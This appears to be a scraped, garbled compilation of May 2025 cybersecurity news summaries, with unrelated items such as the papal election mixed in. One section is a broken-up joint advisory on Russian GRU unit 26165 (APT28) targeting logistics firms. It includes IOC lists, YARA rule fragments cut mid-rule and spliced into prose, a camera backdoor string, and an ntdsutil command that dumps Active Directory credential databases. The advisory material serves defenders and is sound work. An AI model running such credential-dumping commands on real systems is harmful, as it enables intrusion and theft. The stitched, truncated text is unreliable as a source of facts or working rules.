control systems (ICS) of critical infrastructure entities in the United States." "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Instructions for Linux users Source: Hunt.io The command drops the "mapeal.sh" payload on the target"s system, which, according to Hunt.io, does not perform any malicious actions in its current version, limited to fetching a JPEG image from the attacker"s server. "Autosummary:
"Autosummary:
“The TeleMessage archiving backend through 2025-05-05 holds cleartext copies of messages from TM SGNL (aka Archive Signal) app users, which is different functionality than described in the TeleMessage “End-to-End encryption from the mobile phone through to the corporate archive” documentation, as exploited in the wild in May 2025.” reads the advisory. Though not all data was accessed, the threat actor hacked the company in just 20 minutes, raising national security concerns, especially as top U.S. officials, including Waltz, were using the tool during sensitive discussions. "Autosummary:
"This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.
Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting.
This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations.
The following authors and co-sealers are releasing this CSA:
Autosummary:
*.000[.]pe *.1cooldns[.]com *.42web[.]io *.4cloud[.]click *.accesscan[.]org *.bumbleshrimp[.]com *.camdvr[.]org *.casacam[.]net *.ddnsfree[.]com *.ddnsgeek[.]com *.ddnsguru[.]com *.dynuddns[.]com *.dynuddns[.]net *.free[.]nf *.freeddns[.]org *.frge[.]io *.glize[.]com *.great-site[.]net *.infinityfreeapp[.]com *.kesug[.]com *.loseyourip[.]com *.lovestoblog[.]com *.mockbin[.]io *.mockbin[.]org *.mocky[.]io *.mybiolink[.]io *.mysynology[.]net *.mywire[.]org *.ngrok[.]io *.ooguy[.]com *.pipedream[.]net *.rf[.]gd Outlook CVE Exploitation IOCs md-shoeb@alfathdoor[.]com[.]sa jayam@wizzsolutions[.]com accounts@regencyservice[.]in m.salim@tsc-me[.]com vikram.anand@4ginfosource[.]com mdelafuente@ukwwfze[.]com sarah@cosmicgold469[.]co[.]za franch1.lanka@bplanka[.]com commerical@vanadrink[.]com maint@goldenloaduae[.]com karina@bhpcapital[.]com tv@coastalareabank[.]com ashoke.kumar@hbclife[.]in 213[.]32[.]252[.]221 124[.]168[.]91[.]178 194[.]126[.]178[.]8 159[.]196[.]128[.]120 Commonly Used Webmail Providers portugalmail[.]pt mail-online[.]dk email[.]cz seznam[.]cz Malicious Archive Filenames Involving CVE-2023-38831 calc.war.zip news_week_6.zip Roadmap.zip SEDE-PV-2023-10-09-1_EN.zip war.zip Zeyilname.zip Brute Forcing IP Addresses Disclaimer: These IP addresses date June 2024 through August 2024. Utilities and scripts Legitimate utilities Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise: ntdsutil – A legitimate Windows executable used by threat actors to export contents of Active Directory wevtutil – A legitimate Windows executable used by threat actors to delete event logs vssadmin – A legitimate Windows executable possibly used by threat actors to make a copy of the server’s C: drive ADexplorer – A legitimate window executable to view, edit, and backup Active Directory Certificate Services OpenSSH – The Windows version of a legitimate open source SSH client schtasks – A legitimate Windows executable used to create persistence using scheduled tasks whoami – A legitimate Windows executable used to retrieve the name of the current user tasklist – A legitimate Windows executable used to retrieve the list of running processes hostname – A legitimate Windows executable used to retrieve the device name arp – A legitimate Windows executable used to retrieve the ARP table for mapping the network environment systeminfo – A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information net – A legitimate Windows executable used to retrieve detailed user information wmic – A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives cacls – A legitimate Windows executable used to modify permissions on files icacls – A legitimate Windows executable used to modify permissions to files and handle integrity levels and ownership ssh – A legitimate Windows executable used to establish network shell connections reg – A legitimate Windows executable used to add to or modify the system registry Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly. The countries with targeted entities include the following, as illustrated in Figure 1: Bulgaria Czech Republic France Germany Greece Italy Moldova Netherlands Poland Romania Slovakia Ukraine United States Figure 1: Countries with Targeted Entities Initial Access TTPs To gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to): Credential guessing [T1110.001] / brute forceIPAddressToString" $command_7 = "@(0x4e,0x54,0x4c,0x4d, 0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x01,0x82,0x00,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)" $command_8 = ".AllKeys" $variable_1 = "$NTLMAuthentication" nocase $variable_2 = "$NTLMType2" nocase $variable_3 = "$listener" nocase $variable_4 = "$hostip" nocase $variable_5 = "$request" nocase $variable_6 = "$ntlmt2" nocase $variable_7 = "$NTLMType2Response" nocase $variable_8 = "$buffer" nocase condition: 5 of ($command_*) or all of ($variable_*) } HEADLACE shortcut rule APT28_HEADLACE_SHORTCUT { meta: description = "Detects the HEADLACE backdoor shortcut dropper.These accounts contained information on aid shipments to Ukraine, including: sender, recipient, train/plane/ship numbers, point of departure, destination, container registration numbers, travel route, and cargo contents.Militaire Inlichtingen- en Veiligheidsdienst Download the PDF version of this report: For a downloadable list of IOCs, visit: Introduction For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions.An open source python script for finding insecure passwords stored in Group Policy Preferences ldap-dump.py – A script for enumerating user accounts and other information in Active Directory Hikvision backdoor string: “YWRtaW46MTEK” Suspicious command lines While the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise: edge.exe “-headless-new -disable-gpu” ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit ssh -Nf schtasks /create /xml[T1021.001] to access additional hosts and attempt to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2: Example Active Directory Domain Services command: C:\Windows\system32 tdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit Figure 2: Example Active Directory Domain Services command Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory.From a sample available to the authoring agencies of over 10,000 cameras targeted via this effort, the geographic distribution of victims showed a strong focus on cameras in Ukraine and border countries, as shown in Table 1: Table 1: Geographic distribution of targeted IP cameras Country Percentage of Total Attempts Ukraine 81.0% Romania 9.9% Poland 4.0% Hungary 2.8% Slovakia 1.7% Others 0.6% Mitigation Actions General Security Mitigations Architecture and Configuration Employ appropriate network segmentation [D3-NI] and restrictions to limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisionsThere were a number of known malware variants tied to this campaign against logistics sector victims, including: HEADLACE [7] MASEPIE [8] While other malware variants, such as OCEANMAP and STEELHOOK, [8] were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggest that they could be deployed against logistics and IT entities should the need arise.Bezpečnostní informační služba Poland Internal Security Agency (ABW) Agencja Bezpieczeństwa Wewnętrznego Poland Military Counterintelligence Service (SKW) Służba Kontrwywiadu Wojskowego United States Cybersecurity and Infrastructure Security Agency (CISA) United States Department of Defense Cyber Crime Center (DC3) United States Cyber Command (USCYBERCOM) Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)Redirector services used include: Webhook[.]site FrgeIO InfinityFree Dynu Mocky Pipedream Mockbin[.]org The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executablesCSeq: 2 Authorization: Digest username="admin", realm="[a-f0-9]{12}", algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}" User-Agent: "Autosummary:
This type of malware can also steal cryptocurrency wallets, private keys, and text files likely to contain sensitive information, such as those named seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt, *.txt, and *.pdf. From past campaigns, the attack likely distributed an infostealer, which can steal cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium browsers. "Autosummary:
"Autosummary:
According to Morphisec, Noodlophile is being sold on dark web forums, often bundled with "Get Cookie + Pass" services, so it"s a new malware-as-a-service operation linked to Vietnamese-speaking operators. "Autosummary:
The U.S. Justice Department charged Russian nationals, Alexey Viktorovich Chertkov, 37, Kirill Vladimirovich Morozov, 41, Aleksandr Aleksandrovich Shishkin, 36, and Dmitriy Rubtsov, 38, a Kazakhstani national, with Conspiracy and Damage to Protected Computers for conspiring with others to maintain, operate, and profit from Anyproxy and 5socks services.The system checks deny-lists to avoid detection, but open access allows customers to carry out a broad range of malicious activities like ad fraud, DDoS, brute force attacks, and data exploitation. "Autosummary:
Ascension reveals personal data of 437,329 patients exposed in cyberattack Pierluigi Paganini May 10, 2025 May 10, 2025 A data breach at Ascension, caused by a former partner’s compromise, exposed the health information of over 430,000 patients. "Autosummary:
Reuters A woman holds an image of Cardinal Robert Francis Prevost in front of the Cathedral of Saint Mary in Chiclayo, Peru, after he was elected the new Pope, 8 May 2025 Janinna Sesa, who met Prevost while she worked for the church"s Caritas nonprofit, told the Associated Press during torrential rains in 2022 he waded through mud to help people in Chiclayo and nearby villages.He arrived at the Augustinian mission in Chulucanas, in the Peruvian department of Piura, in 1985, aged 30, and the following year, joined the mission in Trujillo. "Coro unveiled its Security Awareness Training (SAT) module. A purpose-built solution, SAT helps SMBs reduce human error, defend against phishing attacks, and demonstrate compliance without adding new tools to manage. As part of Coro’s modular cybersecurity platform, the new Security Awareness Training module delivers maximum protection with minimal complexity. “Over 90% of breaches start with human error,” said Coro’s CEO, Guy Moskowitz. “AI has made phishing attacks more convincing than ever, which is why our … More
The post Coro SAT module defends against phishing attacks appeared first on Help Net Security.
"Autosummary:
This approach reduces tool sprawl, friction, and manual overhead while delivering adaptive, automated training within the same platform SMBs use to protect endpoints, data, and users. "Autosummary:
The updates also arrive as Google appears to be readying an Advanced Protection feature in Android 16 that, in some ways, mirrors Apple"s approach by turning off JavaScript, disabling 2G connections, and activating a number of security features by default, such as Theft Detection Lock, Offline Device Lock, Android Safe Browsing, spam protection in Messages. "Autosummary:
According to Onapsis, hundreds of SAP systems globally have fallen victim to attacks spanning industries and geographies, including energy and utilities, manufacturing, media and entertainment, oil and gas, pharmaceuticals, retail, and government organizations. "The affiliate panel of the infamous LockBit Ransomware-as-a-Service (RaaS) group has been hacked and defaced, showing a link to a MySQL database dump ostensibly containing leaked data relating to the group’s operations: The defaced dark web affiliate panel (Source: Help Net Security) The breach has been confirmed by LockBitSupp – the creator, developer and administator of the LockBit ransomware group – who downplayed the attack by saying that decryptors, stolen company data, and the ransomware … More
The post LockBit hacked: What does the leaked data show? appeared first on Help Net Security.
"Autosummary:
The dump of the backend MySQL database was apparently generated on April 29, 2025, and contains: Nearly 60,000 unique bitcoin addresses / wallets Custom versions of the ransomware created for specific attacks and the associated public keys Nearly 4,500 negotiation messages exchanged by the ransomware operators and victims A list of 76 affiliates (i.e., users of the affiliate panel) "Autosummary:
"Autosummary:
Another attacker, A2, with a 10% success rate (1 in 10), would need about 88 targets to ensure at least one success, while a more skilled attacker, A3, with a 20% success rate (1 in 5), would only need around 42 targets for the same probability. The current approach to vulnerability management is rooted in its name: focusing on "vulnerabilities" (as defined by CVE, CVSS, EPSS, misconfiguration, errors, etc) and their "management." In 2023, Google"s Threat Analysis Group (TAG) and Mandiant identified 97 zero-day exploits, primarily affecting mobile devices, operating systems, browsers, and other applications.By September 2024, the CVE program, active for 25 years, had published over 264,000 CVEs, and by 15 April 2025, the number of total CVEs increased to approximately 290,000 CVEs including "Rejected" or "Deferred". To demonstrate the tradeoff between coverage and efficiency, we need two datasets: one representing potential patches (VOC dataset) and another representing actively exploited vulnerabilities, which includes CISA KEV [10], ethical hacking findings, and data from our CERT Vulnerability Intelligence Watch service [12]. We can assume each hacker has a certain "probability" of compromising a system, with this probability increasing based on their skill, experience, tools, and time.The disclosure of serious vulnerabilities is complicated by disagreements between researchers and vendors over impact, relevance, and accuracy, affecting the wider community [1, 2].In-Depth Analysis: Statistics from CyberSOC, Vulnerabilitiy scanning, Pentesting, CERT, Cy-X and Ransomware observations from Dark Net surveillance.This response can include patching, reconfiguring, filtering, adding compensating controls, or even removing vulnerable systems. "Autosummary:
Vulnerable models include: E1200 E2500 E1000 E4200 E1500 E300 E3200 WRT320N E1550 WRT610N E100 M10 WRT310N The FBI published indicators of compromise (IoCs) associated with attacks targeting end-of-life routers and mitigations: “The FBI recommends users identify if any of the devices vulnerable to compromise are part of their networking infrastructure. "Autosummary:
The ColdRiver APT (aka “Seaborgium“, “Callisto”, “Star Blizzard”, “TA446”) is a Russian cyberespionage group that has been targeting government officials, military personnel, journalists and think tanks since at least 2015. "Autosummary:
Image Alongside the link to the leaked database, a message left by the attackers reads: "Don"t do crime CRIME IS BAD xoxo from Prague" The downloadable SQL database contains sensitive information about the criminal gang"s activities, including negotiations between LockBit and its victims, victim profiles (including their estimated revenue), Bitcoin addresses linked to LockBit, possible decryption keys, custom ransomware builds, and a list of 75 admins and affiliates. "A clever malware campaign delivering the novel Noodlophile malware is targeting creators and small businesses looking to enhance their productivity with AI tools. But, in an unusual twist, the threat actors are not disguising the malware as legitimate software, but as content / output created by a legitimate-looking AI tool. AI as a social engineering lure “As AI surges into mainstream adoption, millions of users turn daily to AI-powered tools for content creation,” Morphisec security … More
The post Fake AI platforms deliver malware diguised as video content appeared first on Help Net Security.
"Autosummary:
“Previously undocumented in public malware trackers or reports, this stealer combines browser credential theft, wallet exfiltration, and optional remote access deployment,” Uzan noted. "Autosummary:
They could also gain access to personal information, including name, address, phone number(s), email address, date of birth, race, gender, and Social Security numbers (SSNs). "Autosummary:
Chrome"s new anti-scam system, which is integrated into the browser"s "Enhanced Protection," analyzes web pages in real time to detect scam signals like fake virus alerts or full-screen lockouts, which are hallmarks of tech support scams. "Autosummary:
How it works When the user lands on a suspicious page, which is decided by the on-device LLM, based on specific triggers like the Keyboard Lock API, Chrome provides the LLM with the contents of the page that the user is on and queries it to extract security signals, such as the intent of the page. "Autosummary:
In conjunction with the domain seizure, Russian nationals, Alexey Viktorovich Chertkov, 37, Kirill Vladimirovich Morozov, 41, Aleksandr Aleksandrovich Shishkin, 36, and Dmitriy Rubtsov, 38, a Kazakhstani national, have been charged by the U.S. Department of Justice (DoJ) for operating, maintaining, and profiting from the proxy services. To mitigate the risks posed by such proxy botnets, users are advised to regularly reboot routers, install security updates, change default passwords, and upgrade to newer models once they reach EoL status. "Autosummary:
Iranian Foreign Minister Abbas Araqchi has responded by saying he hopes the "absurd rumours" are "no more than a disinformation campaign" and such a move would "bring the wrath of all Iranians". "Autosummary:
In 2024, a law enforcement operation called Operation Cronos took down LockBit"s infrastructure, including 34 servers hosting the data leak website and its mirrors, data stolen from the victims, cryptocurrency addresses, 1,000 decryption keys, and the affiliate panel. "Only 4% of organizations worldwide have achieved the ‘mature’ level of readiness required to withstand cybersecurity threats, according to Cisco’s 2025 Cybersecurity Readiness Index. This is a slight increase from last year’s index, in which 3% of organizations worldwide were designated as mature. This demonstrates that despite a slight improvement from last year, global cybersecurity preparedness remains low as hyperconnectivity and AI introduce new complexities for security practitioners. AI is changing the threat landscape AI … More
The post Global cybersecurity readiness remains critically low appeared first on Help Net Security.
"Autosummary:
Investment priorities shift While 96% of organizations plan to upgrade their IT infrastructure, only 45% allocate more than 10% of their IT budget to cybersecurity (down 8% year-over-year), emphasizing a critical need for more focused investment in comprehensive defense strategies, which is incredibly important as threats are not slowing. "Within the average enterprise, non-human identities (NHIs) now outnumber employees, contractors, and customers by anything between 10-to-1 and 92-to-1. Add to this the fragmentation of human identity management resulting from authorizing a single person’s access to multiple on-premises, cloud computing and hybrid environments, and enterprise identity and access management (IAM) becomes extremely challenging. Trust no-one The concept of applying zero-trust policies to reduce the risk of unauthorized access to corporate IT environments has been promoted … More
The post How agentic AI and non-human identities are transforming cybersecurity appeared first on Help Net Security.
"Autosummary:
Managing NHIs and identity sprawl with AI Identity, governance and administration (IGA) technology augmented with AI can continuously analyze each individual’s and NHI’s access, and dynamically adapt access according to that person, or entity’s behavior.Analyzing an entire enterprise ecosystem to understand who’s using what, when, and where, and then using machine learning and AI to modify and adapt policies and governance, could result in automated, cyclical improvement processes.Within the average enterprise, non-human identities (NHIs) now outnumber employees, contractors, and customers by anything between 10-to-1 and 92-to-1. "The tech industry is experiencing significant layoffs, leaving thousands of IT and cybersecurity professionals in search of new employment opportunities. Unfortunately, as these individuals search for new opportunities, scammers are actively preying on them. Losing a job, especially when you can’t afford to be without income, is emotionally stressful, and desperation can make you vulnerable to these types of scams. Given the ongoing economic uncertainty, market volatility, and the adoption of AI across industries, more … More
The post Wave of tech layoffs leads to more job scams appeared first on Help Net Security.
"Autosummary:
AI and job scams With the rise of AI, these scams are about to get more convincing, as emails, job postings, and even video calls with scammers posing as job recruiters will be hard to distinguish. Trust your instincts If something feels off, such as vague job descriptions, unusually high salaries for minimal work, or pressure to act quickly, it’s best to proceed with caution. "Autosummary:
"Clicking "I"m not a robot" triggers a Binance Smart Contract, using an EtherHiding technique, to deliver a Base64-encoded command to the clipboard, which users are prompted to run in Terminal via macOS-specific shortcuts (⌘ + Space, ⌘ + V)," an independent researcher who goes by the alias Badbyte said. "Autosummary:
"Autosummary:
Most of the exposed devices are based in the United States (8,720), followed by Germany (1,518), Taiwan (789), and Canada (761). "Autosummary:
"SonicWall has fixed multiple vulnerabilities affecting its SMA100 Series devices, one of which (CVE-2025-32819) appears to be a patch bypass for an arbitrary file delete vulnerability that was exploited in zero-day attacks in early 2021, and may have also been leveraged in the wild. The vulnerabilities and the attack chain Sonicwall SMA100 Series appliances provide a unified secure access (VPN) gateway for small and medium-size businesses, and are regularly targeted by attackers. Reported by Rapid7 … More
The post Yet another SonicWall SMA100 vulnerability exploited in the wild (CVE-2025-32819) appeared first on Help Net Security.
"Autosummary:
In a write-up released on Wednesday, Emmons has demonstrated how the three vulnerabilities could be leveraged in a sequence that ends with the attacker gaining root-level remote code execution on a vulnerable SMA device: CVE-2025-32819 can be exploited remotely to delete the primary SQLite database, which will trigger a system reboot to factory default settings and thus reset the password of the default SMA admin user to “password” After logging in as admin to the SMA web interface, CVE-2025-32820 can be exploited to make a specific directory writable CVE-2025-32821 can be leveraged to write a malicious executable file into the directory, which will be executed by the device “Based on our testing, the unauthenticated arbitrary file delete vulnerability disclosed by NCC Group "Autosummary:
"Enterprises and organizations, especially those with high-value assets like sensitive data relating to governance, as well as intellectual property, infrastructure data, and access credentials should continue to be vigilant and implement proactive security measures to prevent falling victim to cyber attacks." "Autosummary:
Attack flow (Varonis) While these attacks targeted enterprise administrators, whose accounts would typically provide the threat actors with privileged credentials after compromise, Varonis believes they may have maintained access to the victims" systems for days and even weeks to collect credentials needed to access off-site cloud backups without being detected. "Autosummary:
"Autosummary:
Unsuspecting users who land on these pages are served a static screenshot of the legitimate wallet interface, clicking which, one of the below three behaviors happen - Redirect the user to legitimate websites Redirect the user to other intermediary sites Direct the user to a lookalike phishing page that prompts them to enter their seed phrase, effectively draining their wallets "The entire flow is frictionless by design, blending SEO manipulation, familiar visual elements, and platform trust to lull victims into a false sense of legitimacy," the researchers said. "FreeDrain uses SEO manipulation, free-tier web services (like gitbook.io, webflow.io, and github.io), and layered redirection techniques to target cryptocurrency wallets," security researchers Kenneth Kinion, Sreekar Madabushi, and Tom Hegel said in a technical report shared with The Hacker News. "Autosummary:
"Agenda ransomware activity was primarily observed in healthcare, technology, financial services, and telecommunications sectors across the U.S., the Netherlands, Brazil, India, and the Philippines," according to Trend Micro"s data from the first quarter of 2025. "Autosummary:
Ron van Kemenade, the bank"s group chief operating officer, said around 700,000 people who are customers of Lloyds, Halifax, Bank of Scotland and MBNA were affected as they couldn"t log into their accounts on a first attempt. "Autosummary:
However, when BleepingComputer asked Pearson about whether they paid a ransom, what they meant by "legacy data," how many customers were impacted, and if customers would be notified, the company responded that they would not be commenting on these questions. "Autosummary:
"Autosummary:
(Colombia) .jp (Japan) .br (Brazil) .tw (Taiwan) .ph (Philippines) .fr (France) “Finally, this is a rich source of operational and technical intelligence. "A new report from bot defense firm Kasada has exposed the growing threat of ALTSRUS, a fraud syndicate targeting some of the most vulnerable corners of the digital economy. Researchers revealed how the group has scaled its operations to steal and resell accounts tied to Electronic Benefit Transfer (EBT), pharmacy prescriptions, and consumer rewards programs. Kasada’s threat intelligence team refers to ALTSRUS as the “Reverse Robin Hood” because of its focus on taking from those … More
The post Digital welfare fraud: ALTSRUS syndicate exploits the financially vulnerable appeared first on Help Net Security.
"Autosummary:
"Autosummary:
In a nutshell, discordpydebug could be used to read sensitive data, such as configuration files, tokens, and credentials, tamper with existing files, download additional payloads, and run commands to exfiltrate data. "Autosummary:
U.S. CISA adds FreeType flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini May 07, 2025 May 07, 2025 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds FreeType flaw to its Known Exploited Vulnerabilities catalog. "Autosummary:
TeleMessage, which is owned by Smarsh, says that it has suspended the app"s operation while it investigates the security breach: "Upon detection, we acted quickly to contain it and engaged an external cybersecurity firm to support our investigation," the company said in a statement. "WatchTowr researchers have released a proof-of-concept (PoC) exploit that chains two vulnerabilities in SysAid On-Prem – the self-hosted version of the platform behind SysAid’s popular IT service management and IT helpdesk solutions – to achieve unauthenticated remote code execution on the underlying server. The vulnerabilities have been patched in SysAid On-Prem v24.4.60, released in early March 2025, but it’s likely that many enterprises have not upgraded yet. Creating the PoC “In an on-premise deployment, SysAid … More
The post PoC exploit for SysAid pre-auth RCE released, upgrade quickly! appeared first on Help Net Security.
"Autosummary:
Upgrade and/or prevent access to SysAid instances If your SysAid instance is internet-facing, you should upgrade it as soon as possible, if not immediately: With a PoC publicly available and SysAid On-Prem having been targeted by ransomware gangs in the past, it’s only a matter of time until exploitation attempts start. "BlueVoyant launched its Continuous Optimization for Microsoft Security (COMS) offering. COMS improves security outcomes, helps customers stay ahead of cyber threats, and minimizes technology costs by drawing on BlueVoyant’s expertise with the Microsoft Security stack. The Microsoft Security suite provides maximum cyber defense when it is properly configured, supplied with threat-responsive detections, and continuously optimized. However, many enterprises struggle to manage these solutions well at scale. BlueVoyant’s Continuous Optimization for Microsoft Security is designed to … More
The post BlueVoyant introduces Continuous Optimization for Microsoft Security appeared first on Help Net Security.
"Autosummary:
Adrian Grigorof, BlueVoyant SVP Microsoft professional services, added, “Enterprises are now seeing the need for technology management, including access to advanced technology, threat intelligence, and expertise.Threat detection engineering: Access to threat-centric and targeted threat detection analytics, with BlueVoyant’s threat detection engineering team creating custom detection analytics for each enterprise. "Google has released fixes for a bucketload of Android security vulnerabilities, including a FreeType flaw (CVE-2025-27363) that “may be under limited, targeted exploitation.” About CVE-2025-27363 CVE-2025-27363 is an out of bounds write vulnerability in FreeType, an open-source software library that renders fonts (thus, text) onto digital displays (e.g., screens) and is used across many platforms, including Android, iOS, macOS, and Linux. FreeType has been the source of multiple security vulnerabilities over the years, mostly due … More
The post Actively exploited FreeType flaw fixed in Android (CVE-2025-27363) appeared first on Help Net Security.
"Autosummary:
About CVE-2025-27363 CVE-2025-27363 is an out of bounds write vulnerability in FreeType, an open-source software library that renders fonts (thus, text) onto digital displays (e.g., screens) and is used across many platforms, including Android, iOS, macOS, and Linux. "Autosummary:
" One of the batch files, called "servtask.bat," is used to escalate privileges, dump the SAM, SYSTEM, and SECURITY Registry hives, create a new user named "LocalSvc," and it to the Administrator group. The attack is notable for the use of Grixba, a bespoke information stealer previously attributed to Play and an exploit for CVE-2025-29824 that"s dropped in the Music folder, giving it names that masquerade as Palo Alto Networks software (e.g., "paloaltoconfig.exe" and "paloaltoconfig.dll")." Other ransomware attacks detected in recent months have leveraged a new Ransomware-as-a-Service (RaaS) known as PlayBoy Locker, which provides relatively unskilled cybercriminals with a comprehensive toolkit comprising ransomware payloads, management dashboards, and support services. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Besides other direct payments, called recovery fees, processing fees, tax clearance, or compliance charges, the scammers will typically try to get hold of: Financial information like credit card details, bank account numbers, cryptocurrency wallet addresses, and private keys.Subject: Recovery of Funds – Immediate Action Required Date: April 22, 2025 To: [victim’s email address] “Dear [Full Name], This is to notify you that after a recent audit by the Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3), we have identified your case as eligible for full recovery of lost funds stemming from your previous online fraud complaint (Case ID: #IC3-R2471982-Q2). : Scammers may ask for sensitive data, including Social Security numbers, bank account details, or login credentials. "Autosummary:
"Autosummary:
In April 2025, experts disclosed a critical vulnerability, tracked as CVE-2025-30065 (CVSS score of 10.0), impacting Apache Parquet’s Java Library that could allow remote code execution “Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code” reads the advisory. “All confidentiality, integrity, and availability of the affected system are at risk (in CVSS terms, “High” impact on all three). Despite the frightening potential, it’s important to note that the vulnerability can only be exploited if a malicious Parquet file is imported.”Canary Exploit tool allows to find servers affected by Apache Parquet flaw Pierluigi Paganini May 07, 2025 May 07, 2025 F5 Labs researchers released a PoC tool to find servers vulnerable to the Apache Parquet vulnerability CVE-2025-30065. "Autosummary:
The messages impersonate major brands like Amazon, Rakuten, PayPal, Apple, tax agencies, and banks. "Autosummary:
"Autosummary:
Play ransomware affiliate leveraged zero-day to deploy malware Pierluigi Paganini May 07, 2025 May 07, 2025 The Play ransomware gang exploited a high-severity Windows Common Log File System flaw in zero-day attacks to deploy malware. "Autosummary:
Always contact the authority in question independently (rather than replying to the email/text) Never divulge sensitive persona and financial information online or over the phone Remember that scammers can spoof their Caller ID to appear legitimate Never pay alleged fines by gift cards, crypto or money transfers If threatened while on the phone, stay calm, ask where the person is calling from, hang up and then call that office to check its legitimacy Keep up to date with the latest scam tactics from the FTC and other government sites Use anti-malware on all devices and computers to help filter out phishing messages and emails What to do if you’ve been scammed If you realize you’ve been scammed, don’t panic.Work step by step through the following: If you’re on a call, hang up immediately Make a note of as much information as possible, including the ‘name’ and/or badge number of the scammer, what they said and where they called/emailed from, and payment details Report the incident to the police and FTC.While they may not be able to help you recover any stolen money, it may help others Call your bank and freeze your credit/debit cards Monitor your bank account for any unusual activity Freeze your credit with the three big credit agencies, so scammers can take out credit lines in your name It can be a daunting task when threatened with jail time and steep fines.Yet scammers will do so, often requesting that funds be transferred by crypto, gift cards, wire transfer or an instant payment app like Zelle, Venmo or Cash App. "Autosummary:
"Application Security Specialist Signify | Netherlands | On-site – View job details As an Application Security Specialist, you will define and deploy the application security strategy for security improvements to be in pair with the industry and its benchmarks. Coordinate and perform security and vulnerability assessments, code reviews, pen tests and verifications, and drives remediation. Identify, assess, and manage risks to meet the security needs of the organization. CloudOps – Security TeKnowledge | UAE | … More
The post Cybersecurity jobs available right now: May 6, 2025 appeared first on Help Net Security.
"Autosummary:
Insider Threat Management Analyst Marsh McLennan | Ireland | Hybrid – View job details As an Insider Threat Management Analyst, you will design, build, test, deploy, maintain, troubleshoot, and document the MMC Insider Threat tools, functions, processes, and documentation. IT Security Operations Analyst Oldendorff Carriers | UAE | On-site – View job details As an IT Security Operations Analyst, you will investigate and analyse security events, alerts, and logs, anomalous and misuse activities to identify potential security breaches, determine the root cause, scope of impact, and extent of compromise and take appropriate actions to mitigate them and document findings to support incident response and remediation efforts. Security Developer Metrea | United Kingdom | Hybrid – View job details As a Security Developer, your responsibilities will be focused on cybersecurity analytics development, testing of configuration and configuration management, software security and risk assessment, customized configuration polices, profiles, and system features, and the development of security dashboards and reports. Principal Engineer, Cyber Security SPH Media | Singapore | On-site – View job details As a Principal Engineer, Cyber Security, you will develop, implement, and maintain secure architectures for on-premises, hybrid, and cloud-based environments. Senior Security Engineer Final | Israel | On-site – View job details As a Senior Security Engineer, you will design, deploy, and operate technologies to detect, prevent, and analyze security threats in a diverse and complex environment, encompassing both public cloud and on-premises systems. Offensive Security Team Lead JFrog | Israel | On-site – View job details As an Offensive Security Team Lead, you will lead, plan, design, and execute Red Team operations, threat modeling, and adversarial simulations against JFrog’s infrastructure and cloud environments. "Most attacks don’t start with malware; they begin with a message that seems completely normal, whether it comes through email, a phone call, or a chat, and that is exactly what makes them so effective. These threats rely on psychological manipulation to bypass people, not firewalls. Pressure is applied, authority is faked, and communication is mimicked. Social engineering threats account for most cyberthreats faced by individuals in 2024, according to Avast. Some people are easier … More
The post How cybercriminals exploit psychological triggers in social engineering attacks appeared first on Help Net Security.
"Autosummary:
Mimicking friends, coworkers, trusted emails, websites, or messages makes attempts seem more legitimate, making it harder to recognize when something is a scam. “With a physical intrusion, so many factors come into play—time of day, location, the security in place, and the people trusted to maintain it.Most attacks don’t start with malware; they begin with a message that seems completely normal, whether it comes through email, a phone call, or a chat, and that is exactly what makes them so effective. "Autosummary:
"Autosummary:
"Autosummary:
